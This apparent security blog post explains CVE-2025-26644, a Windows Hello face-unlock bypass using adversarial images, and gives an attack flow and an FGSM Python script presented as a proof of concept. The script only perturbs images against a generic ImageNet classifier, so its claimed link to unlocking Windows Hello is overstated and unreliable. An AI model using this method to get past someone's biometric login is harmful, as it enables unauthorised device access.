

Windows Hello’s facial recognition is meant to keep your device out of unwanted hands. But a recently disclosed flaw, CVE-2025-26644, shows that attackers may be able to get past it with carefully manipulated images, without your real face. In this post, we’ll break down what this vulnerability means, how an adversary could exploit it, and look at some sample code and references for further reading.

What is CVE-2025-26644?

CVE-2025-26644 describes a flaw in the way Windows Hello’s automated recognition mechanism handles manipulated input. Windows Hello is supposed to detect and reject tampered or "adversarial" images, meaning images with small changes designed to fool computers but not people. With this bug, that detection is inadequate, so an attacker with a crafted image or video can unlock your device even though it is supposed to be secure.

How does the attack work?

Suppose someone wants to get into your computer. With this bug, the attacker just needs a photo or a video of your face. Instead of using it plainly (which Windows Hello blocks), they can make tiny, precise tweaks (called "adversarial perturbations") to it so Windows Hello thinks it’s a legitimate face scan.
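As a rough formalization of those "tiny, precise tweaks", one common construction is the Fast Gradient Sign Method (FGSM). The notation below is introduced here for illustration and is not taken from the advisory: x is the input image with pixel values in [0, 1], y is its label, f_θ is the recognition model, 𝓛 is the training loss, and ε is the maximum change allowed per pixel.

```latex
\[
x_{\text{adv}} = \operatorname{clip}_{[0,1]}\!\Bigl( x + \epsilon \cdot \operatorname{sign}\bigl( \nabla_x \mathcal{L}(f_\theta(x), y) \bigr) \Bigr),
\qquad
\lVert x_{\text{adv}} - x \rVert_\infty \le \epsilon
\]
```

Every pixel moves by at most ε, which is why the result can look nearly identical to the original while the model's output changes.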

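Here’s a simplified attack flow:

1. Obtain a photo/video of the target (e.g., social media, security cam).

2. Apply adversarial perturbations to that photo or video.

3. Present the modified image to the Windows Hello camera in place of a live face.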

Exploit Details: Proof of Concept (PoC)

Let’s try to simulate this attack using basic Python code with a popular adversarial attack method.

Example Code: Creating an Adversarial Image

Here’s simplified code that generates an adversarial image with FGSM (Fast Gradient Sign Method). This is for educational testing only; do not use it for illegal purposes.

```python
import torch
import torchvision
import torchvision.transforms as transforms
from PIL import Image


def generate_adversarial_example(image_path, model):
    # Load the image as RGB and scale it to a 1x3x224x224 tensor in [0, 1]
    image = Image.open(image_path).convert("RGB")
    transform = transforms.Compose([
        transforms.Resize((224, 224)),
        transforms.ToTensor(),
    ])
    input_image = transform(image).unsqueeze(0)
    input_image.requires_grad = True

    # Placeholder class index standing in for the face class
    label = torch.tensor([0])
    criterion = torch.nn.CrossEntropyLoss()

    # Forward pass
    output = model(input_image)
    loss = criterion(output, label)

    # Backward pass: gradient of the loss with respect to the input pixels
    model.zero_grad()
    loss.backward()

    # FGSM attack: step in the direction that increases the loss for `label`
    epsilon = 0.05
    perturbed_image = input_image + epsilon * input_image.grad.sign()
    perturbed_image = torch.clamp(perturbed_image, 0, 1).detach()

    # Save the adversarial image
    torchvision.utils.save_image(perturbed_image, "adversarial_face.png")


# Load a pre-trained ImageNet classifier as a stand-in (not a face recognition model)
model = torchvision.models.resnet18(weights=torchvision.models.ResNet18_Weights.DEFAULT)
model.eval()

# Call the attack
generate_adversarial_example("victim_face.jpg", model)
```

This produces a "lookalike" image with minute pixel changes, of the kind that a vulnerable recognition system might mistakenly accept.

Important: Windows Hello uses a proprietary model, but public models (like ResNet) can simulate similar weaknesses for academic demonstration. In real attacks, adversaries tune attacks specifically for the device’s model.
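To see the FGSM mechanics without a deep network or any third-party library, here is a minimal sketch on a toy logistic model. The weights, bias, and input are hypothetical values chosen for illustration; they have nothing to do with Windows Hello's model. For a logistic model with cross-entropy loss, the gradient with respect to the input is (p - y) * w, so it can be written by hand.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def predict(weights, bias, x):
    """Probability that x belongs to class 1 under a logistic model."""
    return sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias)


def sign(v):
    return (v > 0) - (v < 0)


def fgsm(weights, bias, x, y, epsilon):
    """One FGSM step against binary cross-entropy loss.

    The input gradient of the loss is (p - y) * w, so each feature
    moves by epsilon in the direction that increases the loss.
    """
    p = predict(weights, bias, x)
    grad = [(p - y) * w for w in weights]
    stepped = [xi + epsilon * sign(g) for xi, g in zip(x, grad)]
    # Keep every feature inside the valid [0, 1] range
    return [min(1.0, max(0.0, v)) for v in stepped]


# Hypothetical toy model and input (illustrative values only)
weights = [2.0, -3.0, 1.5, -1.0]
bias = 0.1
x = [0.6, 0.4, 0.5, 0.5]
y = 1  # true class of x

x_adv = fgsm(weights, bias, x, y, epsilon=0.05)
print("score before:", predict(weights, bias, x))
print("score after: ", predict(weights, bias, x_adv))
```

With these values the class-1 score drops from about 0.59 to about 0.49, so the decision flips even though no feature changed by more than 0.05. A real recognition pipeline is far more complex, so this only illustrates the principle.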

Has this Really Happened in the Wild?

Yes, at least in research settings. Past work (see Evil Twins: Adversarial Attacks Against Windows Hello Face Authentication) has shown that off-the-shelf technology can defeat Windows Hello’s face check, even using printed photos or images displayed on a screen.

Windows Hello is exposed to this class of attack because it relies on neural networks, and deep learning models in general can be fooled by small, precise changes that are hard for the human eye to notice.
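To put a number on "small", the sketch below measures a perturbation in two common ways: the largest per-pixel change (L∞ distance) and the peak signal-to-noise ratio (PSNR). The pixel values and sign pattern are made up for illustration, and the epsilon of 0.05 simply mirrors the example code in this post.

```python
import math


def linf_distance(a, b):
    """Largest absolute per-pixel difference (pixels as floats in [0, 1])."""
    return max(abs(x - y) for x, y in zip(a, b))


def psnr(a, b):
    """Peak signal-to-noise ratio in dB for pixel values in [0, 1]."""
    mse = sum((x - y) ** 2 for x, y in zip(a, b)) / len(a)
    return float("inf") if mse == 0 else 10 * math.log10(1.0 / mse)


# Hypothetical flattened grayscale patch and a +/- epsilon perturbation of it
epsilon = 0.05
original = [0.20, 0.35, 0.50, 0.65, 0.80, 0.45]
signs = [1, -1, 1, 1, -1, -1]
perturbed = [p + epsilon * s for p, s in zip(original, signs)]

max_change = linf_distance(original, perturbed)
print(f"max change: {max_change:.3f} (~{max_change * 255:.0f} of 255 levels)")
print(f"PSNR: {psnr(original, perturbed):.1f} dB")
```

An epsilon of 0.05 corresponds to roughly 13 intensity levels on an 8-bit scale. Whether a change of that size is actually noticeable depends on the image and the viewing conditions, so attackers generally look for the smallest epsilon that still works.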

Who is At Risk?

Any Windows Hello user, especially those whose systems have not been patched with the latest Microsoft security updates. Windows Hello is found on millions of computers.

Resources & References

- Microsoft Security Advisory on Windows Hello

- Evil Twins: Adversarial Attacks Against Windows Hello Face Authentication (arXiv Paper)

- Foolbox: Adversarial Attacks Library

- OpenAI on Adversarial Examples

Final Words

CVE-2025-26644 shows that no single-factor biometric authentication is perfect. Keep your devices updated, use more than just face unlock, and be careful what you post online. Vulnerabilities like these remind us that even the best tech needs backup.

Timeline

Published on: 04/08/2025 18:15:48 UTC

Last modified on: 05/06/2025 17:03:26 UTC